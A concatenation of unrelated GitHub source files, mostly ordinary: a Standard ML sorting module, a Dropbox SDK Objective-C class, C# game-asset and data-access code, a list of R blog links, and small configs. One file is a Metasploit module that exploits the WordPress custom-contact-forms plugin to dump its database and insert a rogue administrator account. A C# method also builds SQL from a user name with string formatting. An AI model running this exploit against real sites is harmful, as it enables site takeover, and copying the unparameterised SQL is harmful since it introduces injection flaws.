# # Sorting # # -- Allen Leung ### "Never express yourself more clearly ### than you are able to think." ### ### -- Niels Bohr api SORTING = api my sort: (X * X -> Bool) -> List(X) -> List(X) my sort_uniq: (X * X -> Bool) -> (X * X -> Bool) -> List(X) -> List(X) my merge: (X * X -> Bool) -> List(X) * List(X) -> List(X) my merge_uniq: (X * X -> Bool) -> (X * X -> Bool) -> List(X) * List(X) -> List(X) my merge_uniqs: (X * X -> Bool) -> (X * X -> Bool) -> List( List(X) ) -> List(X) my uniq: (X * X -> Bool) -> List(X) -> List(X) end package Sorting: SORTING = pkg infix ==== fun gensort merge op< l = let fun sort [] = [] | sort (l as [x]) = l | sort (l as [x, y]) = if x < y then l else [y, x] | sort l = let fun split ([], a, b) = (a, b) | split (x . xs, a, b) = split (xs, b, x . a) my (a, b) = split (l,[],[]) in merge (sort a, sort b) end in sort l end fun merge op< (a, b) = let fun m ([], a) = a | m (a,[]) = a | m (a as (u . v), b as (w . x)) = if u < w then u . m (v, b) else w . m (a, x) in m (a, b) end fun merge_uniq op< op==== (a, b) = let fun m ([], a) = uniq op==== a | m (a,[]) = uniq op==== a | m (a as (u . v), b as (w . x)) = if u ==== w then m (a, x) else if u < w then u . m (v, b) else w . m (a, x) in m (a, b) end and uniq op==== l = let fun f [] = [] | f (l as [x]) = l | f (x . (l as (y . z))) = if x ==== y then f l else x . f l in f l end fun sort op< l = gensort (merge op<) op< l fun sort_uniq op< op==== l = gensort (merge_uniq op< op====) op< l fun merge_uniqs op< op==== l = sort_uniq op< op==== (list::cat l) end
{ "pile_set_name": "Github" }
# Changelog All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/) and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html). ## [1.0.5] - 2018-08-25 ### Changed - Removed `prepublish` script from `package.json` ## [1.0.4] - 2017-08-08 ### New - Added a changelog ### Changed - Ignore `yarn.lock` and `package-lock.json` files
{ "pile_set_name": "Github" }
/// /// Copyright (c) 2020 Dropbox, Inc. All rights reserved. /// #import "DBURLSessionTaskWithTokenRefresh.h" #import "DBAccessTokenProvider.h" #import "DBDelegate.h" #import "DBOAuthResult.h" #import "DBURLSessionTaskResponseBlockWrapper.h" @interface DBURLSessionTaskWithTokenRefresh () @property (nonatomic, weak) DBDelegate *taskDelegate; @property (nonatomic, strong) DBURLSessionTaskCreationBlock taskCreationBlock; @property (nonatomic, strong) id<DBAccessTokenProvider> tokenProvider; @property (nonatomic, strong) DBProgressBlock progressBlock; @property (nonatomic, strong) NSOperationQueue *progressQueue; @property (nonatomic, strong) DBURLSessionTaskResponseBlockWrapper *responseBlockWrapper; @property (nonatomic, strong) NSOperationQueue *responseQueue; @property (nonatomic, strong) dispatch_queue_t serialQueue; @property (nonatomic, strong, nullable) NSURLSessionTask *sessionTask; @property (nonatomic, assign) BOOL cancelled; @property (nonatomic, assign) BOOL suspended; @property (nonatomic, assign) BOOL started; @end @implementation DBURLSessionTaskWithTokenRefresh @synthesize session = _session; - (instancetype)initWithTaskCreationBlock:(DBURLSessionTaskCreationBlock)taskCreationBlock taskDelegate:(DBDelegate *)taskDelegate urlSession:(NSURLSession *)urlSession tokenProvider:(id<DBAccessTokenProvider>)tokenProvider { self = [super init]; if (self) { _taskCreationBlock = taskCreationBlock; _taskDelegate = taskDelegate; _session = urlSession; _tokenProvider = tokenProvider; dispatch_queue_attr_t qosAttribute = dispatch_queue_attr_make_with_qos_class(DISPATCH_QUEUE_SERIAL, QOS_CLASS_USER_INITIATED, 0); _serialQueue = dispatch_queue_create("com.dropbox.dropbox_sdk_obj_c.DBURLSessionTaskWithTokenRefresh.queue", qosAttribute); } return self; } - (id<DBURLSessionTask>)duplicate { return [[DBURLSessionTaskWithTokenRefresh alloc] initWithTaskCreationBlock:_taskCreationBlock taskDelegate:_taskDelegate urlSession:_session tokenProvider:_tokenProvider]; } - (void)cancel { dispatch_async(_serialQueue, ^{ self->_cancelled = YES; [self->_sessionTask cancel]; }); } - (void)suspend { dispatch_async(_serialQueue, ^{ self->_suspended = YES; [self->_sessionTask suspend]; }); } - (void)resume { dispatch_async(_serialQueue, ^{ if (self->_started) { [self->_sessionTask resume]; } else { self->_started = YES; [self db_start]; } }); } - (void)setProgressBlock:(DBProgressBlock)progressBlock queue:(NSOperationQueue *)queue { dispatch_async(_serialQueue, ^{ self->_progressBlock = progressBlock; self->_progressQueue = queue; [self db_setProgressHandlerIfNecessary]; }); } - (void)setResponseBlock:(DBURLSessionTaskResponseBlockWrapper *)responseBlockWrapper queue:(NSOperationQueue *)queue { dispatch_async(_serialQueue, ^{ self->_responseBlockWrapper = responseBlockWrapper; self->_responseQueue = queue; [self db_setResponseHandlerIfNecessary]; }); } #pragma mark Private helpers - (void)db_start { DBOAuthCompletion completion = ^(DBOAuthResult *result) { dispatch_async(self->_serialQueue, ^{ [self db_handleTokenRefreshResult:result]; }); }; if (_tokenProvider) { [_tokenProvider refreshAccessTokenIfNecessary:completion]; } else { completion(nil); } } - (void)db_handleTokenRefreshResult:(DBOAuthResult *)result { if ([result isError] && result.errorType != DBAuthInvalidGrant) { // Refresh failed, due to an error that's not invalid grant, e.g. A refresh request timed out. // Complete request with error immediately, so developers could retry and get access token refreshed. // Otherwise, the API request may proceed with an expired access token which would lead to // a false positive auth error. [self db_completeWithError:result.nsError]; } else { // Refresh succeeded or a refresh is not required, i.e. access token is valid, continue request normally. // Or // Refresh failed due to invalid grant, e.g. refresh token revoked by user. // Continue, and the API call would failed with an auth error that developers can handle properly. // e.g. Sign out the user upon auth error. [self db_initializeSessionTask]; } } - (void)db_initializeSessionTask { _sessionTask = _taskCreationBlock(); [self db_setProgressHandlerIfNecessary]; [self db_setResponseHandlerIfNecessary]; if (_cancelled) { [_sessionTask cancel]; } else if (_suspended) { [_sessionTask suspend]; } else if (_started) { [_sessionTask resume]; } } - (void)db_setProgressHandlerIfNecessary { if (_sessionTask && _progressBlock) { [_taskDelegate addProgressHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session progressHandler:_progressBlock progressHandlerQueue:_progressQueue]; } } - (void)db_setResponseHandlerIfNecessary { if (_sessionTask == nil || _responseBlockWrapper == nil) { return; } if (_responseBlockWrapper.rpcResponseBlock) { [_taskDelegate addRpcResponseHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session responseHandler:_responseBlockWrapper.rpcResponseBlock responseHandlerQueue:_responseQueue]; } else if (_responseBlockWrapper.uploadResponseBlock) { [_taskDelegate addUploadResponseHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session responseHandler:_responseBlockWrapper.uploadResponseBlock responseHandlerQueue:_responseQueue]; } else if (_responseBlockWrapper.downloadResponseBlock) { [_taskDelegate addDownloadResponseHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session responseHandler:_responseBlockWrapper.downloadResponseBlock responseHandlerQueue:_responseQueue]; } } - (void)db_completeWithError:(NSError *)error { NSOperationQueue *queue = _responseQueue ?: [NSOperationQueue mainQueue]; DBURLSessionTaskResponseBlockWrapper *blockWrapper = _responseBlockWrapper; [queue addOperationWithBlock:^{ if (blockWrapper.rpcResponseBlock) { blockWrapper.rpcResponseBlock(nil, nil, error); } else if (blockWrapper.uploadResponseBlock) { blockWrapper.uploadResponseBlock(nil, nil, error); } else if (blockWrapper.downloadResponseBlock) { blockWrapper.downloadResponseBlock(nil, nil, error); } }]; } @end
{ "pile_set_name": "Github" }
using FModel.Creator.Texts; using PakReader.Pak; using PakReader.Parsers.Class; using PakReader.Parsers.PropertyTagData; namespace FModel.Creator.Bundles { public class Quest { public string Description; public int Count; public Reward Reward; public Quest() { Description = ""; Count = 0; Reward = null; } public Quest(UObject obj) : this() { if (obj.TryGetValue("Description", out var d) && d is TextProperty description) Description = Text.GetTextPropertyBase(description); if (obj.TryGetValue("ObjectiveCompletionCount", out var o) && o is IntProperty objectiveCompletionCount) Count = objectiveCompletionCount.Value; if (obj.TryGetValue("Objectives", out var v1) && v1 is ArrayProperty a1 && a1.Value.Length > 0 && a1.Value[0] is StructProperty s && s.Value is UObject objectives) { if (string.IsNullOrEmpty(Description) && objectives.TryGetValue("Description", out var od) && od is TextProperty objectivesDescription) Description = Text.GetTextPropertyBase(objectivesDescription); if (Count == 0 && objectives.TryGetValue("Count", out var c) && c is IntProperty count) Count = count.Value; } if (obj.TryGetValue("RewardsTable", out var v4) && v4 is ObjectProperty rewardsTable) { PakPackage p = Utils.GetPropertyPakPackage(rewardsTable.Value.Resource.OuterIndex.Resource.ObjectName.String); if (p.HasExport() && !p.Equals(default)) { var u = p.GetExport<UDataTable>(); if (u != null && u.TryGetValue("Default", out var i) && i is UObject r && r.TryGetValue("TemplateId", out var i1) && i1 is NameProperty templateId && r.TryGetValue("Quantity", out var i2) && i2 is IntProperty quantity) { Reward = new Reward(quantity, templateId); } } } if (Reward == null && obj.TryGetValue("Rewards", out var v2) && v2 is ArrayProperty rewards) { foreach (StructProperty reward in rewards.Value) { if (reward.Value is UObject r1 && r1.TryGetValue("ItemPrimaryAssetId", out var i1) && i1 is StructProperty itemPrimaryAssetId && r1.TryGetValue("Quantity", out var i2) && i2 is IntProperty quantity) { if (itemPrimaryAssetId.Value is UObject r2 && r2.TryGetValue("PrimaryAssetType", out var t1) && t1 is StructProperty primaryAssetType && r2.TryGetValue("PrimaryAssetName", out var t2) && t2 is NameProperty primaryAssetName) { if (primaryAssetType.Value is UObject r3 && r3.TryGetValue("Name", out var k) && k is NameProperty name) { if (!name.Value.String.Equals("Quest") && !name.Value.String.Equals("Token") && !name.Value.String.Equals("ChallengeBundle") && !name.Value.String.Equals("GiftBox")) { Reward = new Reward(quantity, primaryAssetName); break; } } } } } } if (Reward == null && obj.TryGetValue("HiddenRewards", out var v3) && v3 is ArrayProperty hiddenRewards) { foreach (StructProperty reward in hiddenRewards.Value) { if (reward.Value is UObject r1 && r1.TryGetValue("TemplateId", out var i1) && i1 is NameProperty templateId && r1.TryGetValue("Quantity", out var i2) && i2 is IntProperty quantity) { Reward = new Reward(quantity, templateId); break; } } } } } }
{ "pile_set_name": "Github" }
[ { "title": "Introducing tidyr", "href": "https://blog.rstudio.org/2014/07/22/introducing-tidyr/" }, { "title": "R / Finance 2013 Call for Papers", "href": "http://dirk.eddelbuettel.com/blog/2012/12/17/" }, { "title": "R: How to Transform “prob” Predictions to a Single Column of Predicted Values", "href": "http://hack-r.com/r-how-to-transform-prob-predictions-to-a-single-column-of-predicted-values/" }, { "title": "expectation-propagation and ABC", "href": "https://xianblog.wordpress.com/2011/08/24/expectation-propagation-and-abc/" }, { "title": "Portable, personal packages", "href": "http://rmflight.github.io/posts/2013/09/github_packages.html" }, { "title": "Programmers Should Know R", "href": "http://www.win-vector.com/blog/2011/08/programmers-should-know-r/?utm_source=rss&utm_medium=rss&utm_campaign=programmers-should-know-r" }, { "title": "magrittr", "href": "http://ipub.com/magrittr/" }, { "title": "InfoWorld: SAS and SPSS rise to R opportunity", "href": "https://web.archive.org/web/http://blog.revolution-computing.com/2010/02/infoworld-sas-and-spss-rise-to-r-opportunity.html" }, { "title": "Strata 2015: Keynote roundup", "href": "http://blog.revolutionanalytics.com/2015/02/strata-2015-keynote-roundup.html" }, { "title": "NBA Drafting", "href": "http://www.moreorlessnumbers.com/2014/06/nba-drafting.html" }, { "title": "Sustainability through Energy Load Shaping for Buildings using R", "href": "http://blog.revolutionanalytics.com/2016/07/energy-load-shaping.html" }, { "title": "My first competition at Kaggle", "href": "https://web.archive.org/web/http://www.investuotojas.eu/2012/07/02/my-first-competition-at-kaggle/" }, { "title": "Career NBA: The Road Least Traveled", "href": "https://feedproxy.google.com/~r/graphoftheweek/fzVA/~3/tZBRCMSLvEs/career-nba-road-least-traveled.html" }, { "title": "R syntax highlighting for Smultron", "href": "https://web.archive.org/web/https://dataninja.wordpress.com/2006/06/14/r-syntax-highlighting-for-smultron/" }, { "title": "Size of XDF files using RevoScaleR package", "href": "https://tomaztsql.wordpress.com/2016/09/22/size-of-xdf-files-using-revoscaler-package/" }, { "title": "Examples and resources on association rule mining with R", "href": "https://rdatamining.wordpress.com/2012/07/13/examples-and-resources-on-association-rule-mining-with-r/" }, { "title": "Recent Common Ancestors: Simple Model", "href": "http://www.exegetic.biz/blog/2015/05/recent-common-ancestors/" }, { "title": "the Art of R Programming [guest post]", "href": "https://xianblog.wordpress.com/2012/01/31/the-art-of-r-programming-guest-post/" }, { "title": "A handy concatenation operator", "href": "https://ctszkin.com/2013/02/12/a-handy-concatenatio-operator/" }, { "title": "Beta and expected returns", "href": "https://feedproxy.google.com/~r/PortfolioProbeRLanguage/~3/XEiC8lNt_As/" }, { "title": "vennpieR: combination of venn diagram and pie chart in R", "href": "http://onetipperday.sterding.com/2014/09/vennpier-combination-of-venn-diagram.html" }, { "title": "Build multiarch R (32 bit and 64 bit) on Debian/Ubuntu", "href": "https://web.archive.org/web/http://blog.nguyenvq.com/2011/08/10/build-multiarch-r-32-bit-and-64-bit-on-debianubuntu/" }, { "title": "Set up Sublime Text for light-weight all-in-one data science IDE", "href": "http://opiateforthemass.es/articles/set-up-sublime-text-for-light-weight-all-in-one-data-science-ide/" }, { "title": "Quick Shiny Demo – Exploring NHS Winter Sit Rep Data", "href": "https://blog.ouseful.info/2012/11/28/quick-shiny-demo-exploring-nhs-winter-sit-rep-data/" }, { "title": "BayesFactorExtras: a sneak preview", "href": "http://bayesfactor.blogspot.com/2015/02/bayesfactorextras-sneak-preview.html" }, { "title": "Data visualization in social sciences – what’s new in the sjPlot-package? #rstats", "href": "https://strengejacke.wordpress.com/2016/05/19/data-visualization-in-social-sciences-whats-new-in-the-sjplot-package-rstats/" }, { "title": "R/Finance 2013 Call for Papers", "href": "https://tradeblotter.wordpress.com/2013/01/05/rfinance-2013-call-for-papers/" }, { "title": "Le Monde puzzle [#840]", "href": "https://xianblog.wordpress.com/2013/11/23/le-monde-puzzle-840/" }, { "title": "Select operations on R data frames", "href": "http://digitheadslabnotebook.blogspot.com/2009/07/select-operations-on-r-data-frames.html" }, { "title": "Simulating Win/Loss streaks with R rle function", "href": "http://intelligenttradingtech.blogspot.com/2011/05/simulating-winloss-streaks-with-r-rle.html" }, { "title": "an attempt at EP-ABC from scratch, nothing more… [except for a few bugs]", "href": "https://xianblog.wordpress.com/2016/10/19/an-attempt-at-ep-abc-from-scratch-nothing-more-except-for-a-few-bugs/" }, { "title": "Linear Regression using R", "href": "http://www.tatvic.com/blog/linear-regression-using-r/" }, { "title": "ABC model choice by random forests", "href": "https://xianblog.wordpress.com/2014/06/25/abc-model-choice-by-random-forests/" }, { "title": "The Relative Importance of Predictors – Let the Games Begin!", "href": "http://joelcadwell.blogspot.com/2012/08/the-relative-importance-of-predictors.html" }, { "title": "Project Euler — problem 7", "href": "https://web.archive.org/web/http://ec2-184-73-106-109.compute-1.amazonaws.com/wordpress/?p=95" }, { "title": "Portfolio Risk Surfaces", "href": "https://www.rmetrics.org/blog/RiskSurfaces" }, { "title": "Who Has the Best Fantasy Football Projections? 2016 Update", "href": "http://fantasyfootballanalytics.net/2016/03/best-fantasy-football-projections-2016-update.html" }, { "title": "Whale charts – Visualising customer profitability", "href": "http://www.magesblog.com/2014/01/whale-charts-visualising-customer.html" }, { "title": "Look ma! No typing! Autorunning code on R startup", "href": "https://4dpiecharts.com/2012/07/20/look-ma-no-typing-autorunning-code-on-r-startup/" }, { "title": "Implementing the CountSummary Procedure", "href": "http://exploringdatablog.blogspot.com/2012/09/implementing-countsummary-procedure.html" }, { "title": "Project Euler — Problem 187", "href": "https://web.archive.org/web/http://www.cwcity.de/fehler/404.php" }, { "title": "The making of cricket package yorkr – Part 1", "href": "https://gigadom.wordpress.com/2016/03/05/the-making-of-cricket-package-yorkr-part-1-2/" }, { "title": "Veterinary Epidemiologic Research: Linear Regression Part 2 – Checking assumptions", "href": "https://denishaine.wordpress.com/2013/03/07/veterinary-epidemiologic-research-linear-regression-part-2-checking-assumptions/" }, { "title": "How to Remember the Poisson Distribution", "href": "http://perfdynamics.blogspot.com/2014/07/how-to-remember-poisson-distribution.html" }, { "title": "Time Series Decomposition", "href": "http://r-datameister.blogspot.com/2013/08/time-series-decomposition.html" }, { "title": "Making Back-to-Back Histograms", "href": "https://hopstat.wordpress.com/2014/06/10/making-back-to-back-histograms/" }, { "title": "Social Network Analysis using R and Gephis", "href": "http://www.rcasts.com/2010/04/social-network-analysis-using-r-and.html" }, { "title": "ggplot2 2.1.0", "href": "https://blog.rstudio.org/2016/03/03/ggplot2-2-1-0/" }, { "title": "Smoothing Techniques using basis functions: Gaussian Basis", "href": "http://datascienceplus.com/smoothing-techniques-using-basis-functions-gaussian-basis/" }, { "title": "Fast-track publishing using knitr: stitching it together (part V)", "href": "http://gforge.se/2014/01/fast-track-publishing-using-knitr-part-v/" } ]
{ "pile_set_name": "Github" }
<?php /** * @package deployment */ require_once (__DIR__ . '/../../bootstrap.php'); $script = realpath(dirname(__FILE__) . "/../../../tests/standAloneClient/exec.php"); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Deleted_A_Comment.template.xml"); deployTemplate($script, $xml); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Deleted_A_Comment_AppSpecific.template.xml"); deployTemplate($script, $xml); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Replied_To_Comment.template.xml"); deployTemplate($script, $xml); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Replied_To_Comment_AppSpecific.template.xml"); deployTemplate($script, $xml); function deployTemplate($script, $config) { if(!file_exists($config)) { KalturaLog::err("Missing file [$config] will not deploy"); return; } passthru("php $script $config"); }
{ "pile_set_name": "Github" }
#ifndef LOCALCLEANSCHEDULER_H #define LOCALCLEANSCHEDULER_H #include <QDialog> #include "QMegaMessageBox.h" #include "megaapi.h" namespace Ui { class LocalCleanScheduler; } class LocalCleanScheduler : public QDialog { Q_OBJECT public: explicit LocalCleanScheduler(QWidget *parent = 0); bool daysLimit(); int daysLimitValue(); void setDaysLimit(bool value); void setDaysLimitValue(int limit); ~LocalCleanScheduler(); private: Ui::LocalCleanScheduler *ui; protected: void changeEvent(QEvent *event); private slots: void on_cRemoveFilesOlderThan_clicked(); void on_bOK_clicked(); void on_bCancel_clicked(); }; #endif // LOCALCLEANSCHEDULER_H
{ "pile_set_name": "Github" }
#!/usr/bin/env bash echo Starting Karma without any tests to download dependencies ./node_modules/.bin/karma start ./config/karma.config.js --no-fail-on-empty-test-suite --reporters=quiet
{ "pile_set_name": "Github" }
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress custom-contact-forms Plugin SQL Upload', 'Description' => %q{ The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download a SQL dump of the plugins database tables. It's also possible to upload files containing SQL statements which will be executed. The module first tries to extract the WordPress table prefix from the dump and then attempts to create a new admin user. }, 'Author' => [ 'Marc-Alexandre Montpas', # Vulnerability discovery 'Christian Mehlmauer' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ], [ 'WPVDB', '7542' ] ], 'DisclosureDate' => 'Aug 07 2014' )) end def get_sql(table_prefix, username, password) # create user sql = "INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');" # make user administrator sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}capabilities','a:1:{s:13:\"administrator\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}user_level','10');" sql end def get_table_prefix res = send_request_cgi({ 'uri' => wordpress_url_admin_post, 'method' => 'POST', 'vars_post' => { 'ccf_export' => "1" } }) return nil if res.nil? || res.code != 302 || res.headers['Location'] !~ /\.sql$/ file = res.headers['Location'] res_file = send_request_cgi('uri' => file) return nil if res_file.nil? || res_file.code != 200 || res_file.body.nil? match = res_file.body.match(/insert into `(.+_)customcontactforms_fields`/i) return nil if match.nil? || match.length < 2 table_prefix = match[1] table_prefix end def run username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? print_error("Unable to get table_prefix") return else print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new data.add_part(get_sql(table_prefix, username, password), 'text/plain', nil, "form-data; name=\"import_file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.sql\"") data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res.nil? || res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms' fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end # test login cookie = wordpress_login(username, password) # login successful if cookie print_good("User #{username} with password #{password} successfully created") store_valid_credential(user: username, private: password, proof: cookie) else print_error("User creation failed") return end end end
{ "pile_set_name": "Github" }
using NBCZ.DAL; using NBCZ.Model; using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace NBCZ.BLL { public partial class Pub_UserBLL { Pub_UserDAL dal = new Pub_UserDAL(); /// <summary> /// 获取编号 /// </summary> /// <param name="pCode"></param> /// <returns></returns> public string GetCode() { var code = "00000001"; List<Pub_User> users = GetList("", " Id Desc ", 1); if (users.Count > 0) { var model = users.First(); code = (Convert.ToInt32(model.UserCode.Remove(0, 1)) + 1).ToString().PadLeft(8, '0'); } return code; } /// <summary> /// 修改删除状态 /// </summary> /// <param name="where"></param> /// <returns></returns> public bool ChangeSotpStatus(string where, object pms) { return dal.ChangeSotpStatus(where, pms); } /// <summary> /// 根据用户名获取用户 /// </summary> /// <param name="userName"></param> /// <returns></returns> public Pub_User GetUserByUserName(string userName) { var dbUser = GetList(string.Format(" StopFlag=0 AND UserName='{0}' ", userName)).FirstOrDefault(); return dbUser; } /// <summary> /// 修改密码 /// </summary> /// <param name="userName"></param> /// <returns></returns> public bool EditPassWord(string userCode,string pwd) { return dal.EditPassWord(userCode,pwd); } } }
{ "pile_set_name": "Github" }
// Base Class Definition // ------------------------- .#{$fa-css-prefix} { display: inline-block; font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration font-size: inherit; // can't have font-size inherit on line above, so need to override text-rendering: auto; // optimizelegibility throws things off #1094 -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; }
{ "pile_set_name": "Github" }
namespace Serenity { export enum SummaryType { Disabled = -1, None = 0, Sum = 1, Avg = 2, Min = 3, Max = 4 } }
{ "pile_set_name": "Github" }
// Copyright 2011 Google Inc. All rights reserved. // Use of this source code is governed by the Apache 2.0 // license that can be found in the LICENSE file. package internal import ( "strings" ) func parseFullAppID(appid string) (partition, domain, displayID string) { if i := strings.Index(appid, "~"); i != -1 { partition, appid = appid[:i], appid[i+1:] } if i := strings.Index(appid, ":"); i != -1 { domain, appid = appid[:i], appid[i+1:] } return partition, domain, appid } // appID returns "appid" or "domain.com:appid". func appID(fullAppID string) string { _, dom, dis := parseFullAppID(fullAppID) if dom != "" { return dom + ":" + dis } return dis }
{ "pile_set_name": "Github" }
using System.Linq; using System.Windows.Forms; namespace SimpleTreeMapTests { public partial class Form1 : Form { public Form1() { InitializeComponent(); treeMap1.ObjectNameGetter = o => o.ToString(); treeMap1.ObjectValueGetter = o => (int)o; treeMap1.Populate(new [] {10,9,8,7,6,5,3,3,3,1}.Cast<object>()); } } }
{ "pile_set_name": "Github" }
{ "compilerOptions": { "alwaysStrict": true, "target": "es2017", "module": "commonjs", "declaration": true, "strict": true, "sourceMap": true, "downlevelIteration": true, "importHelpers": true, "noEmitHelpers": true, "incremental": true, "resolveJsonModule": true, "esModuleInterop": true, "declarationDir": "./types", "outDir": "dist/cjs" }, "typedocOptions": { "exclude": "**/node_modules/**", "excludedNotExported": true, "excludePrivate": true, "hideGenerator": true, "ignoreCompilerErrors": true, "mode": "file", "out": "./docs", "plugin": "@aws-sdk/client-documentation-generator" } }
{ "pile_set_name": "Github" }
# universe start date start_date: "2010-01-01" # trading frequency freq: 'W-FRI' # trading stocks tickers: - 'AAPL' - 'GE' - 'JPM' - 'MSFT' - 'VOD' - 'GS' - 'TSLA' - 'MMM' # csv filename csv_file_returns: 'db/returns.csv' csv_file_prices: 'db/prices.csv' # rolling window size window: 20
{ "pile_set_name": "Github" }
# Copyright 1999-2019 Gentoo Authors # Distributed under the terms of the GNU General Public License v2 EAPI=6 inherit autotools DESCRIPTION="Shell history suggest box" HOMEPAGE="https://github.com/dvorka/hstr http://www.mindforger.com" SRC_URI="https://github.com/dvorka/hstr/archive/${PV}.tar.gz -> ${P}.tar.gz" SLOT="0" LICENSE="Apache-2.0" KEYWORDS="amd64 x86" RDEPEND=" sys-libs/ncurses:0=[unicode]" DEPEND=" ${RDEPEND} virtual/pkgconfig" DOCS=( CONFIGURATION.md README.md ) PATCHES=( ${FILESDIR}/${P}-fix-ncurses-configure.patch ) src_prepare() { default sed \ -e 's:-O2::g' \ -i src/Makefile.am || die eautoreconf }
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------ // <auto-generated> // This code was generated by a tool. // Runtime Version:4.0.30319.42000 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // </auto-generated> //------------------------------------------------------------------------------ namespace Alarm.Resx { using System; /// <summary> /// A strongly-typed resource class, for looking up localized strings, etc. /// </summary> // This class was auto-generated by the StronglyTypedResourceBuilder // class via a tool like ResGen or Visual Studio. // To add or remove a member, edit your .ResX file then rerun ResGen // with the /str option, or rebuild your VS project. [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] public class AppResources { private static global::System.Resources.ResourceManager resourceMan; private static global::System.Globalization.CultureInfo resourceCulture; [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] internal AppResources() { } /// <summary> /// Returns the cached ResourceManager instance used by this class. /// </summary> [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] public static global::System.Resources.ResourceManager ResourceManager { get { if (object.ReferenceEquals(resourceMan, null)) { global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Alarm.Resx.AppResources", typeof(AppResources).Assembly); resourceMan = temp; } return resourceMan; } } /// <summary> /// Overrides the current thread's CurrentUICulture property for all /// resource lookups using this strongly typed resource class. /// </summary> [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] public static global::System.Globalization.CultureInfo Culture { get { return resourceCulture; } set { resourceCulture = value; } } /// <summary> /// Looks up a localized string similar to Add. /// </summary> public static string Add { get { return ResourceManager.GetString("Add", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Add alarm. /// </summary> public static string AddAlarm { get { return ResourceManager.GetString("AddAlarm", resourceCulture); } } /// <summary> /// Looks up a localized string similar to after. /// </summary> public static string After { get { return ResourceManager.GetString("After", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Alarm. /// </summary> public static string Alarm { get { return ResourceManager.GetString("Alarm", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Alarm set. /// </summary> public static string AlarmSet { get { return ResourceManager.GetString("AlarmSet", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Dismiss. /// </summary> public static string Dismiss { get { return ResourceManager.GetString("Dismiss", resourceCulture); } } /// <summary> /// Looks up a localized string similar to from now. /// </summary> public static string FromNow { get { return ResourceManager.GetString("FromNow", resourceCulture); } } /// <summary> /// Looks up a localized string similar to one hour. /// </summary> public static string Hour { get { return ResourceManager.GetString("Hour", resourceCulture); } } /// <summary> /// Looks up a localized string similar to hours. /// </summary> public static string Hours { get { return ResourceManager.GetString("Hours", resourceCulture); } } /// <summary> /// Looks up a localized string similar to one minute. /// </summary> public static string Minute { get { return ResourceManager.GetString("Minute", resourceCulture); } } /// <summary> /// Looks up a localized string similar to minutes. /// </summary> public static string Minutes { get { return ResourceManager.GetString("Minutes", resourceCulture); } } /// <summary> /// Looks up a localized string similar to now. /// </summary> public static string Now { get { return ResourceManager.GetString("Now", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Set alarm. /// </summary> public static string SetAlarm { get { return ResourceManager.GetString("SetAlarm", resourceCulture); } } } }
{ "pile_set_name": "Github" }
